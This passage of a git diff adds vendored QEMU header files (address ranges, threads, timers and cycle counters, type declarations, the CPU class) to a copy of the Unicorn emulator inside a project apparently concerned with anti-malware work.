QTAILQ_FOREACH_REVERSE(var, head, headname, field) \ + for ((var) = (*(((struct headname *)((head)->tqh_last))->tqh_last)); \ + (var); \ + (var) = (*(((struct headname *)((var)->field.tqe_prev))->tqh_last))) + +/* + * Tail queue access methods. + */ +#define QTAILQ_EMPTY(head) ((head)->tqh_first == NULL) +#define QTAILQ_FIRST(head) ((head)->tqh_first) +#define QTAILQ_NEXT(elm, field) ((elm)->field.tqe_next) + +#define QTAILQ_LAST(head, headname) \ + (*(((struct headname *)((head)->tqh_last))->tqh_last)) +#define QTAILQ_PREV(elm, headname, field) \ + (*(((struct headname *)((elm)->field.tqe_prev))->tqh_last)) + +#endif /* !QEMU_SYS_QUEUE_H_ */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/range.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/range.h new file mode 100644 index 0000000..f5b1c5f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/range.h @@ -0,0 +1,135 @@ +#ifndef QEMU_RANGE_H +#define QEMU_RANGE_H + +#include "unicorn/platform.h" +#include <qemu/typedefs.h> +#include "qemu/queue.h" + +/* + * Operations on 64 bit address ranges. + * Notes: + * - ranges must not wrap around 0, but can include the last byte ~0x0LL. + * - this can not represent a full 0 to ~0x0LL range. + */ + +/* A structure representing a range of addresses. */ +struct Range { + uint64_t begin; /* First byte of the range, or 0 if empty. */ + uint64_t end; /* 1 + the last byte. 0 if range empty or ends at ~0x0LL. */ +}; + +static inline void range_extend(Range *range, Range *extend_by) +{ + if (!extend_by->begin && !extend_by->end) { + return; + } + if (!range->begin && !range->end) { + *range = *extend_by; + return; + } + if (range->begin > extend_by->begin) { + range->begin = extend_by->begin; + } + /* Compare last byte in case region ends at ~0x0LL */ + if (range->end - 1 < extend_by->end - 1) { + range->end = extend_by->end; + } +} + +/* Get last byte of a range from offset + length. 
+ * Undefined for ranges that wrap around 0. */ +static inline uint64_t range_get_last(uint64_t offset, uint64_t len) +{ + return offset + len - 1; +} + +/* Check whether a given range covers a given byte. */ +static inline int range_covers_byte(uint64_t offset, uint64_t len, + uint64_t byte) +{ + return offset <= byte && byte <= range_get_last(offset, len); +} + +/* Check whether 2 given ranges overlap. + * Undefined if ranges that wrap around 0. */ +static inline int ranges_overlap(uint64_t first1, uint64_t len1, + uint64_t first2, uint64_t len2) +{ + uint64_t last1 = range_get_last(first1, len1); + uint64_t last2 = range_get_last(first2, len2); + + return !(last2 < first1 || last1 < first2); +} + +/* 0,1 can merge with 1,2 but don't overlap */ +static inline bool ranges_can_merge(Range *range1, Range *range2) +{ + return !(range1->end < range2->begin || range2->end < range1->begin); +} + +static inline int range_merge(Range *range1, Range *range2) +{ + if (ranges_can_merge(range1, range2)) { + if (range1->end < range2->end) { + range1->end = range2->end; + } + if (range1->begin > range2->begin) { + range1->begin = range2->begin; + } + return 0; + } + + return -1; +} + +static inline GList *g_list_insert_sorted_merged(GList *list, + gpointer data, + GCompareFunc func) +{ + GList *l, *next = NULL; + Range *r, *nextr; + + if (!list) { + list = g_list_insert_sorted(list, data, func); + return list; + } + + nextr = data; + l = list; + while (l && l != next && nextr) { + r = l->data; + if (ranges_can_merge(r, nextr)) { + range_merge(r, nextr); + l = g_list_remove_link(l, next); + next = g_list_next(l); + if (next) { + nextr = next->data; + } else { + nextr = NULL; + } + } else { + l = g_list_next(l); + } + } + + if (!l) { + list = g_list_insert_sorted(list, data, func); + } + + return list; +} + +static inline gint range_compare(gconstpointer a, gconstpointer b) +{ + Range *ra = (Range *)a, *rb = (Range *)b; + if (ra->begin == rb->begin && ra->end == rb->end) { + 
return 0; + } else if (range_get_last(ra->begin, ra->end) < + range_get_last(rb->begin, rb->end)) { + return -1; + } else { + return 1; + } +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-posix.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-posix.h new file mode 100644 index 0000000..36f2272 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-posix.h @@ -0,0 +1,10 @@ +#ifndef __QEMU_THREAD_POSIX_H +#define __QEMU_THREAD_POSIX_H 1 +#include "pthread.h" +#include <semaphore.h> + +struct QemuThread { + pthread_t thread; +}; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-win32.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-win32.h new file mode 100644 index 0000000..9f82ea2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-win32.h @@ -0,0 +1,14 @@ +#ifndef __QEMU_THREAD_WIN32_H +#define __QEMU_THREAD_WIN32_H 1 +#include "windows.h" + +typedef struct QemuThreadData QemuThreadData; +struct QemuThread { + QemuThreadData *data; + unsigned tid; +}; + +/* Only valid for joinable threads. 
*/ +HANDLE qemu_thread_get_handle(QemuThread *thread); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread.h new file mode 100644 index 0000000..c5d25f6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread.h @@ -0,0 +1,25 @@ +#ifndef __QEMU_THREAD_H +#define __QEMU_THREAD_H 1 + +#include "unicorn/platform.h" + +typedef struct QemuThread QemuThread; + +#ifdef _WIN32 +#include "qemu/thread-win32.h" +#else +#include "qemu/thread-posix.h" +#endif + +#define QEMU_THREAD_JOINABLE 0 +#define QEMU_THREAD_DETACHED 1 + +struct uc_struct; +// return -1 on error, 0 on success +int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, + void *(*start_routine)(void *), + void *arg, int mode); +void *qemu_thread_join(QemuThread *thread); +void qemu_thread_exit(struct uc_struct *uc, void *retval); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/timer.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/timer.h new file mode 100644 index 0000000..d106e68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/timer.h @@ -0,0 +1,371 @@ +#ifndef QEMU_TIMER_H +#define QEMU_TIMER_H + +#include "qemu/typedefs.h" +#include "qemu-common.h" + +/* timers */ + +#define SCALE_MS 1000000 +#define SCALE_US 1000 +#define SCALE_NS 1 + +/** + * QEMUClockType: + * + * The following clock types are available: + * + * @QEMU_CLOCK_REALTIME: Real time clock + * + * The real time clock should be used only for stuff which does not + * change the virtual machine state, as it is run even if the virtual + * machine is stopped. The real time clock has a frequency of 1000 + * Hz. + * + * @QEMU_CLOCK_VIRTUAL: virtual clock + * + * The virtual clock is only run during the emulation. It is stopped + * when the virtual machine is stopped. 
Virtual timers use a high + * precision clock, usually cpu cycles (use ticks_per_sec). + * + * @QEMU_CLOCK_HOST: host clock + * + * The host clock should be used for device models that emulate accurate + * real time sources. It will continue to run when the virtual machine + * is suspended, and it will reflect system time changes the host may + * undergo (e.g. due to NTP). The host clock has the same precision as + * the virtual clock. + */ + +typedef enum { + QEMU_CLOCK_REALTIME = 0, + QEMU_CLOCK_VIRTUAL = 1, + QEMU_CLOCK_HOST = 2, + QEMU_CLOCK_MAX +} QEMUClockType; + +typedef struct QEMUTimerList QEMUTimerList; + +struct QEMUTimerListGroup { + QEMUTimerList *tl[QEMU_CLOCK_MAX]; +}; + +typedef void QEMUTimerCB(void *opaque); +typedef void QEMUTimerListNotifyCB(void *opaque); + +struct QEMUTimer { + int64_t expire_time; /* in nanoseconds */ + QEMUTimerList *timer_list; + QEMUTimerCB *cb; + void *opaque; + QEMUTimer *next; + int scale; +}; + +/* + * QEMUClockType + */ + +/* + * qemu_clock_get_ns; + * @type: the clock type + * + * Get the nanosecond value of a clock with + * type @type + * + * Returns: the clock value in nanoseconds + */ +int64_t qemu_clock_get_ns(QEMUClockType type); + +/** + * qemu_clock_get_ms; + * @type: the clock type + * + * Get the millisecond value of a clock with + * type @type + * + * Returns: the clock value in milliseconds + */ +static inline int64_t qemu_clock_get_ms(QEMUClockType type) +{ + return qemu_clock_get_ns(type) / SCALE_MS; +} + +/** + * qemu_clock_get_us; + * @type: the clock type + * + * Get the microsecond value of a clock with + * type @type + * + * Returns: the clock value in microseconds + */ +static inline int64_t qemu_clock_get_us(QEMUClockType type) +{ + return qemu_clock_get_ns(type) / SCALE_US; +} + +/** + * qemu_timeout_ns_to_ms: + * @ns: nanosecond timeout value + * + * Convert a nanosecond timeout value (or -1) to + * a millisecond value (or -1), always rounding up. 
+ * + * Returns: millisecond timeout value + */ +int qemu_timeout_ns_to_ms(int64_t ns); + +/** + * qemu_soonest_timeout: + * @timeout1: first timeout in nanoseconds (or -1 for infinite) + * @timeout2: second timeout in nanoseconds (or -1 for infinite) + * + * Calculates the soonest of two timeout values. -1 means infinite, which + * is later than any other value. + * + * Returns: soonest timeout value in nanoseconds (or -1 for infinite) + */ +static inline int64_t qemu_soonest_timeout(int64_t timeout1, int64_t timeout2) +{ + /* we can abuse the fact that -1 (which means infinite) is a maximal + * value when cast to unsigned. As this is disgusting, it's kept in + * one inline function. + */ + return ((uint64_t) timeout1 < (uint64_t) timeout2) ? timeout1 : timeout2; +} + +/** + * initclocks: + * + * Initialise the clock & timer infrastructure + */ +void init_clocks(void); + +int64_t cpu_get_ticks(void); +/* Caller must hold BQL */ +void cpu_enable_ticks(void); +/* Caller must hold BQL */ +void cpu_disable_ticks(void); + +static inline int64_t get_ticks_per_sec(void) +{ + return 1000000000LL; +} + +/* + * Low level clock functions + */ + +/* real time host monotonic timer */ +static inline int64_t get_clock_realtime(void) +{ + struct timeval tv; + + gettimeofday(&tv, NULL); + return tv.tv_sec * 1000000000LL + (tv.tv_usec * 1000); +} + +/* Warning: don't insert tracepoints into these functions, they are + also used by simpletrace backend and tracepoints would cause + an infinite recursion! 
*/ +#ifdef _WIN32 +extern int64_t clock_freq; + +static inline int64_t get_clock(void) +{ + LARGE_INTEGER ti; + QueryPerformanceCounter(&ti); + return muldiv64(ti.QuadPart, (uint32_t)get_ticks_per_sec(), (uint32_t)clock_freq); +} + +#else + +static inline int64_t get_clock(void) +{ + return get_clock_realtime(); +} +#endif + +/* icount */ +int64_t cpu_get_icount(void); +int64_t cpu_get_clock(void); +int64_t cpu_get_clock_offset(void); +int64_t cpu_icount_to_ns(int64_t icount); + +/*******************************************/ +/* host CPU ticks (if available) */ + +#if defined(_ARCH_PPC) + +static inline int64_t cpu_get_real_ticks(void) +{ + int64_t retval; +#ifdef _ARCH_PPC64 + /* This reads timebase in one 64bit go and includes Cell workaround from: + http://ozlabs.org/pipermail/linuxppc-dev/2006-October/027052.html + */ + __asm__ __volatile__ ("mftb %0\n\t" + "cmpwi %0,0\n\t" + "beq- $-8" + : "=r" (retval)); +#else + /* http://ozlabs.org/pipermail/linuxppc-dev/1999-October/003889.html */ + unsigned long junk; + __asm__ __volatile__ ("mfspr %1,269\n\t" /* mftbu */ + "mfspr %L0,268\n\t" /* mftb */ + "mfspr %0,269\n\t" /* mftbu */ + "cmpw %0,%1\n\t" + "bne $-16" + : "=r" (retval), "=r" (junk)); +#endif + return retval; +} + +#elif defined(__i386__) + +static inline int64_t cpu_get_real_ticks(void) +{ +#ifdef _MSC_VER + return __rdtsc(); +#else + int64_t val; + asm volatile ("rdtsc" : "=A" (val)); + return val; +#endif +} + +#elif defined(__x86_64__) + +static inline int64_t cpu_get_real_ticks(void) +{ +#ifdef _MSC_VER + return __rdtsc(); +#else + uint32_t low,high; + int64_t val; + asm volatile("rdtsc" : "=a" (low), "=d" (high)); + val = high; + val <<= 32; + val |= low; + return val; +#endif +} + +#elif defined(__hppa__) + +static inline int64_t cpu_get_real_ticks(void) +{ + int val; + asm volatile ("mfctl %%cr16, %0" : "=r"(val)); + return val; +} + +#elif defined(__ia64) + +static inline int64_t cpu_get_real_ticks(void) +{ + int64_t val; + asm volatile ("mov %0 = 
ar.itc" : "=r"(val) :: "memory"); + return val; +} + +#elif defined(__s390__) + +static inline int64_t cpu_get_real_ticks(void) +{ + int64_t val; + asm volatile("stck 0(%1)" : "=m" (val) : "a" (&val) : "cc"); + return val; +} + +#elif defined(__sparc__) + +static inline int64_t cpu_get_real_ticks (void) +{ +#if defined(_LP64) + uint64_t rval; + asm volatile("rd %%tick,%0" : "=r"(rval)); + return rval; +#else + /* We need an %o or %g register for this. For recent enough gcc + there is an "h" constraint for that. Don't bother with that. */ + union { + uint64_t i64; + struct { + uint32_t high; + uint32_t low; + } i32; + } rval; + asm volatile("rd %%tick,%%g1; srlx %%g1,32,%0; mov %%g1,%1" + : "=r"(rval.i32.high), "=r"(rval.i32.low) : : "g1"); + return rval.i64; +#endif +} + +#elif defined(__mips__) && \ + ((defined(__mips_isa_rev) && __mips_isa_rev >= 2) || defined(__linux__)) +/* + * binutils wants to use rdhwr only on mips32r2 + * but as linux kernel emulate it, it's fine + * to use it. + * + */ +#define MIPS_RDHWR(rd, value) { \ + __asm__ __volatile__ (".set push\n\t" \ + ".set mips32r2\n\t" \ + "rdhwr %0, "rd"\n\t" \ + ".set pop" \ + : "=r" (value)); \ + } + +static inline int64_t cpu_get_real_ticks(void) +{ + /* On kernels >= 2.6.25 rdhwr <reg>, $2 and $3 are emulated */ + uint32_t count; + static uint32_t cyc_per_count = 0; + + if (!cyc_per_count) { + MIPS_RDHWR("$3", cyc_per_count); + } + + MIPS_RDHWR("$2", count); + return (int64_t)(count * cyc_per_count); +} + +#elif defined(__alpha__) + +static inline int64_t cpu_get_real_ticks(void) +{ + uint64_t cc; + uint32_t cur, ofs; + + asm volatile("rpcc %0" : "=r"(cc)); + cur = cc; + ofs = cc >> 32; + return cur - ofs; +} + +#else +/* The host CPU doesn't have an easily accessible cycle counter. + Just return a monotonically increasing value. This will be + totally wrong, but hopefully better than nothing. 
*/ +static inline int64_t cpu_get_real_ticks (void) +{ + static int64_t ticks = 0; + return ticks++; +} +#endif + +#ifdef CONFIG_PROFILER +static inline int64_t profile_getclock(void) +{ + return cpu_get_real_ticks(); +} + +extern int64_t qemu_time, qemu_time_start; +extern int64_t tlb_flush_time; +extern int64_t dev_time; +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/typedefs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/typedefs.h new file mode 100644 index 0000000..d9759fc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/typedefs.h @@ -0,0 +1,80 @@ +#ifndef QEMU_TYPEDEFS_H +#define QEMU_TYPEDEFS_H + +/* A load of opaque types so that device init declarations don't have to + pull in all the real definitions. */ +typedef struct QEMUTimer QEMUTimer; +typedef struct QEMUTimerListGroup QEMUTimerListGroup; +typedef struct QEMUFile QEMUFile; +typedef struct QEMUBH QEMUBH; + +typedef struct AioContext AioContext; + +typedef struct Visitor Visitor; + +typedef struct MigrationParams MigrationParams; + +typedef struct Property Property; +typedef struct PropertyInfo PropertyInfo; +typedef struct CompatProperty CompatProperty; +typedef struct DeviceState DeviceState; +typedef struct BusState BusState; +typedef struct BusClass BusClass; + +typedef struct AddressSpace AddressSpace; +typedef struct MemoryRegion MemoryRegion; +typedef struct MemoryRegionSection MemoryRegionSection; +typedef struct MemoryListener MemoryListener; + +typedef struct MemoryMappingList MemoryMappingList; + +typedef struct QEMUMachine QEMUMachine; +typedef struct MachineClass MachineClass; +typedef struct MachineState MachineState; +typedef struct NICInfo NICInfo; +typedef struct HCIInfo HCIInfo; +typedef struct AudioState AudioState; +typedef struct BlockBackend BlockBackend; +typedef struct BlockDriverState BlockDriverState; +typedef struct DriveInfo DriveInfo; +typedef struct DisplayState DisplayState; +typedef 
struct DisplayChangeListener DisplayChangeListener; +typedef struct DisplaySurface DisplaySurface; +typedef struct PixelFormat PixelFormat; +typedef struct QemuConsole QemuConsole; +typedef struct CharDriverState CharDriverState; +typedef struct MACAddr MACAddr; +typedef struct NetClientState NetClientState; +typedef struct I2CBus I2CBus; +typedef struct ISABus ISABus; +typedef struct ISADevice ISADevice; +typedef struct SMBusDevice SMBusDevice; +typedef struct PCIHostState PCIHostState; +typedef struct PCIExpressHost PCIExpressHost; +typedef struct PCIBus PCIBus; +typedef struct PCIDevice PCIDevice; +typedef struct PCIExpressDevice PCIExpressDevice; +typedef struct PCIBridge PCIBridge; +typedef struct PCIEAERMsg PCIEAERMsg; +typedef struct PCIEAERLog PCIEAERLog; +typedef struct PCIEAERErr PCIEAERErr; +typedef struct PCIEPort PCIEPort; +typedef struct PCIESlot PCIESlot; +typedef struct MSIMessage MSIMessage; +typedef struct SerialState SerialState; +typedef struct PCMCIACardState PCMCIACardState; +typedef struct MouseTransformInfo MouseTransformInfo; +typedef struct uWireSlave uWireSlave; +typedef struct I2SCodec I2SCodec; +typedef struct SSIBus SSIBus; +typedef struct EventNotifier EventNotifier; +typedef struct VirtIODevice VirtIODevice; +typedef struct QEMUSGList QEMUSGList; +typedef struct QEMUSizedBuffer QEMUSizedBuffer; +typedef struct SHPCDevice SHPCDevice; +typedef struct FWCfgState FWCfgState; +typedef struct PcGuestInfo PcGuestInfo; +typedef struct Range Range; +typedef struct AdapterInfo AdapterInfo; + +#endif /* QEMU_TYPEDEFS_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/cpu.h new file mode 100644 index 0000000..3a24f78 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/cpu.h @@ -0,0 +1,629 @@ +/* + * QEMU CPU model + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + 
* modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * <http://www.gnu.org/licenses/gpl-2.0.html> + */ +#ifndef QEMU_CPU_H +#define QEMU_CPU_H + +#include <signal.h> +#include <setjmp.h> +#include "hw/qdev-core.h" +#include "exec/hwaddr.h" +#include "qemu/queue.h" +#include "qemu/thread.h" +#include "qemu/typedefs.h" + +typedef int (*WriteCoreDumpFunction)(const void *buf, size_t size, + void *opaque); + +/** + * vaddr: + * Type wide enough to contain any #target_ulong virtual address. + */ +typedef uint64_t vaddr; +#define VADDR_PRId PRId64 +#define VADDR_PRIu PRIu64 +#define VADDR_PRIo PRIo64 +#define VADDR_PRIx PRIx64 +#define VADDR_PRIX PRIX64 +#define VADDR_MAX UINT64_MAX + +/** + * SECTION:cpu + * @section_id: QEMU-cpu + * @title: CPU Class + * @short_description: Base class for all CPUs + */ + +#define TYPE_CPU "cpu" + +/* Since this macro is used a lot in hot code paths and in conjunction with + * FooCPU *foo_env_get_cpu(), we deviate from usual QOM practice by using + * an unchecked cast. 
+ */ +#define CPU(obj) ((CPUState *)(obj)) + +#define CPU_CLASS(uc, class) OBJECT_CLASS_CHECK(uc, CPUClass, (class), TYPE_CPU) +#define CPU_GET_CLASS(uc, obj) OBJECT_GET_CLASS(uc, CPUClass, (obj), TYPE_CPU) + +typedef struct CPUState CPUState; + +typedef void (*CPUUnassignedAccess)(CPUState *cpu, hwaddr addr, + bool is_write, bool is_exec, int opaque, + unsigned size); + +struct TranslationBlock; + +/** + * CPUClass: + * @class_by_name: Callback to map -cpu command line model name to an + * instantiatable CPU type. + * @parse_features: Callback to parse command line arguments. + * @reset: Callback to reset the #CPUState to its initial state. + * @reset_dump_flags: #CPUDumpFlags to use for reset logging. + * @has_work: Callback for checking if there is work to do. + * @do_interrupt: Callback for interrupt handling. + * @do_unassigned_access: Callback for unassigned access handling. + * @do_unaligned_access: Callback for unaligned access handling, if + * the target defines #ALIGNED_ONLY. + * @memory_rw_debug: Callback for GDB memory access. + * @dump_state: Callback for dumping state. + * @dump_statistics: Callback for dumping statistics. + * @get_arch_id: Callback for getting architecture-dependent CPU ID. + * @get_paging_enabled: Callback for inquiring whether paging is enabled. + * @get_memory_mapping: Callback for obtaining the memory mappings. + * @set_pc: Callback for setting the Program Counter register. + * @synchronize_from_tb: Callback for synchronizing state from a TCG + * #TranslationBlock. + * @handle_mmu_fault: Callback for handling an MMU fault. + * @get_phys_page_debug: Callback for obtaining a physical address. + * @debug_excp_handler: Callback for handling debug exceptions. + * @vmsd: State description for migration. + * @cpu_exec_enter: Callback for cpu_exec preparation. + * @cpu_exec_exit: Callback for cpu_exec cleanup. + * @cpu_exec_interrupt: Callback for processing interrupts in cpu_exec. + * + * Represents a CPU family or model. 
+ */ +typedef struct CPUClass { + /*< private >*/ + DeviceClass parent_class; + /*< public >*/ + + ObjectClass *(*class_by_name)(struct uc_struct *uc, const char *cpu_model); + void (*parse_features)(CPUState *cpu, char *str, Error **errp); + + void (*reset)(CPUState *cpu); + int reset_dump_flags; + bool (*has_work)(CPUState *cpu); + void (*do_interrupt)(CPUState *cpu); + CPUUnassignedAccess do_unassigned_access; + void (*do_unaligned_access)(CPUState *cpu, vaddr addr, + int is_write, int is_user, uintptr_t retaddr); + int (*memory_rw_debug)(CPUState *cpu, vaddr addr, + uint8_t *buf, int len, bool is_write); + void (*dump_state)(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); + void (*dump_statistics)(CPUState *cpu, FILE *f, + fprintf_function cpu_fprintf, int flags); + int64_t (*get_arch_id)(CPUState *cpu); + bool (*get_paging_enabled)(const CPUState *cpu); + void (*get_memory_mapping)(CPUState *cpu, MemoryMappingList *list, + Error **errp); + void (*set_pc)(CPUState *cpu, vaddr value); + void (*synchronize_from_tb)(CPUState *cpu, struct TranslationBlock *tb); + int (*handle_mmu_fault)(CPUState *cpu, vaddr address, int rw, + int mmu_index); + hwaddr (*get_phys_page_debug)(CPUState *cpu, vaddr addr); + void (*debug_excp_handler)(CPUState *cpu); + + const struct VMStateDescription *vmsd; + + void (*cpu_exec_enter)(CPUState *cpu); + void (*cpu_exec_exit)(CPUState *cpu); + bool (*cpu_exec_interrupt)(CPUState *cpu, int interrupt_request); +} CPUClass; + +#ifdef HOST_WORDS_BIGENDIAN +typedef struct icount_decr_u16 { + uint16_t high; + uint16_t low; +} icount_decr_u16; +#else +typedef struct icount_decr_u16 { + uint16_t low; + uint16_t high; +} icount_decr_u16; +#endif + +typedef struct CPUBreakpoint { + vaddr pc; + int flags; /* BP_* */ + QTAILQ_ENTRY(CPUBreakpoint) entry; +} CPUBreakpoint; + +typedef struct CPUWatchpoint { + vaddr vaddr; + vaddr len; + vaddr hitaddr; + int flags; /* BP_* */ + QTAILQ_ENTRY(CPUWatchpoint) entry; +} CPUWatchpoint; + 
+struct KVMState; +struct kvm_run; + +#define TB_JMP_CACHE_BITS 12 +#define TB_JMP_CACHE_SIZE (1 << TB_JMP_CACHE_BITS) + +/** + * CPUState: + * @cpu_index: CPU index (informative). + * @nr_cores: Number of cores within this CPU package. + * @nr_threads: Number of threads within this CPU. + * @numa_node: NUMA node this CPU is belonging to. + * @host_tid: Host thread ID. + * @running: #true if CPU is currently running (usermode). + * @created: Indicates whether the CPU thread has been successfully created. + * @interrupt_request: Indicates a pending interrupt request. + * @halted: Nonzero if the CPU is in suspended state. + * @stop: Indicates a pending stop request. + * @stopped: Indicates the CPU has been artificially stopped. + * @tcg_exit_req: Set to force TCG to stop executing linked TBs for this + * CPU and return to its top level loop. + * @singlestep_enabled: Flags for single-stepping. + * @icount_extra: Instructions until next timer event. + * @icount_decr: Number of cycles left, with interrupt flag in high bit. + * This allows a single read-compare-cbranch-write sequence to test + * for both decrementer underflow and exceptions. + * @can_do_io: Nonzero if memory-mapped IO is safe. + * @env_ptr: Pointer to subclass-specific CPUArchState field. + * @current_tb: Currently executing TB. + * @next_cpu: Next CPU sharing TB cache. + * @opaque: User data. + * @mem_io_pc: Host Program Counter at which the memory was accessed. + * @mem_io_vaddr: Target virtual address at which the memory was accessed. + * @kvm_fd: vCPU file descriptor for KVM. + * + * State of one CPU core or thread. 
+ */ +struct CPUState { + /*< private >*/ + DeviceState parent_obj; + /*< public >*/ + + int nr_cores; + int nr_threads; + int numa_node; + + struct QemuThread *thread; +#ifdef _WIN32 + HANDLE hThread; +#endif + int thread_id; + uint32_t host_tid; + bool running; + struct qemu_work_item *queued_work_first, *queued_work_last; + bool thread_kicked; + bool created; + bool stop; + bool stopped; + volatile sig_atomic_t exit_request; + uint32_t interrupt_request; + int singlestep_enabled; + int64_t icount_extra; + sigjmp_buf jmp_env; + + AddressSpace *as; + MemoryListener *tcg_as_listener; + + void *env_ptr; /* CPUArchState */ + struct TranslationBlock *current_tb; + struct TranslationBlock *tb_jmp_cache[TB_JMP_CACHE_SIZE]; + QTAILQ_ENTRY(CPUState) node; + + /* ice debug support */ + QTAILQ_HEAD(breakpoints_head, CPUBreakpoint) breakpoints; + + QTAILQ_HEAD(watchpoints_head, CPUWatchpoint) watchpoints; + CPUWatchpoint *watchpoint_hit; + + void *opaque; + + /* In order to avoid passing too many arguments to the MMIO helpers, + * we store some rarely used information in the CPU context. + */ + uintptr_t mem_io_pc; + vaddr mem_io_vaddr; + + int kvm_fd; + bool kvm_vcpu_dirty; + struct KVMState *kvm_state; + struct kvm_run *kvm_run; + + /* TODO Move common fields from CPUArchState here. */ + int cpu_index; /* used by alpha TCG */ + uint32_t halted; /* used by alpha, cris, ppc TCG */ + union { + uint32_t u32; + icount_decr_u16 u16; + } icount_decr; + uint32_t can_do_io; + int32_t exception_index; /* used by m68k TCG */ + + /* Note that this is accessed at the start of every TB via a negative + offset from AREG0. Leave this field at the end so as to make the + (absolute value) offset as small as possible. This reduces code + size, especially for hosts without large memory offsets. */ + volatile sig_atomic_t tcg_exit_req; + struct uc_struct* uc; +}; + + +/** + * cpu_paging_enabled: + * @cpu: The CPU whose state is to be inspected. 
+ * + * Returns: %true if paging is enabled, %false otherwise. + */ +bool cpu_paging_enabled(const CPUState *cpu); + +/** + * cpu_get_memory_mapping: + * @cpu: The CPU whose memory mappings are to be obtained. + * @list: Where to write the memory mappings to. + * @errp: Pointer for reporting an #Error. + */ +void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list, + Error **errp); + +/** + * cpu_write_elf64_note: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf64_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); + +/** + * cpu_write_elf64_qemunote: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf64_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); + +/** + * cpu_write_elf32_note: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf32_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); + +/** + * cpu_write_elf32_qemunote: + * @f: pointer to a function that writes memory to a file + * @cpu: The CPU whose memory is to be dumped + * @cpuid: ID number of the CPU + * @opaque: pointer to the CPUState struct + */ +int cpu_write_elf32_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); + +/** + * CPUDumpFlags: + * @CPU_DUMP_CODE: + * @CPU_DUMP_FPU: dump FPU register state, not just integer + * @CPU_DUMP_CCOP: dump info about TCG QEMU's condition code optimization state + */ +enum CPUDumpFlags { + CPU_DUMP_CODE = 0x00010000, + CPU_DUMP_FPU = 0x00020000, + CPU_DUMP_CCOP = 0x00040000, +}; + +/** + * cpu_dump_state: + * @cpu: The CPU 
whose state is to be dumped. + * @f: File to dump to. + * @cpu_fprintf: Function to dump with. + * @flags: Flags what to dump. + * + * Dumps CPU state. + */ +void cpu_dump_state(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); + +/** + * cpu_dump_statistics: + * @cpu: The CPU whose state is to be dumped. + * @f: File to dump to. + * @cpu_fprintf: Function to dump with. + * @flags: Flags what to dump. + * + * Dumps CPU statistics. + */ +void cpu_dump_statistics(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); + +#ifndef CONFIG_USER_ONLY +/** + * cpu_get_phys_page_debug: + * @cpu: The CPU to obtain the physical page address for. + * @addr: The virtual address. + * + * Obtains the physical page corresponding to a virtual one. + * Use it only for debugging because no protection checks are done. + * + * Returns: Corresponding physical page address or -1 if no page found. + */ +static inline hwaddr cpu_get_phys_page_debug(CPUState *cpu, vaddr addr) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + return cc->get_phys_page_debug(cpu, addr); +} +#endif + +/** + * cpu_reset: + * @cpu: The CPU whose state is to be reset. + */ +void cpu_reset(CPUState *cpu); + +/** + * cpu_class_by_name: + * @typename: The CPU base type. + * @cpu_model: The model string without any parameters. + * + * Looks up a CPU #ObjectClass matching name @cpu_model. + * + * Returns: A #CPUClass or %NULL if not matching class is found. + */ +ObjectClass *cpu_class_by_name(struct uc_struct *uc, const char *typename_, const char *cpu_model); + +/** + * cpu_generic_init: + * @typename: The CPU base type. + * @cpu_model: The model string including optional parameters. + * + * Instantiates a CPU, processes optional parameters and realizes the CPU. + * + * Returns: A #CPUState or %NULL if an error occurred. + */ +CPUState *cpu_generic_init(struct uc_struct *uc, const char *typename_, const char *cpu_model); + +/** + * cpu_has_work: + * 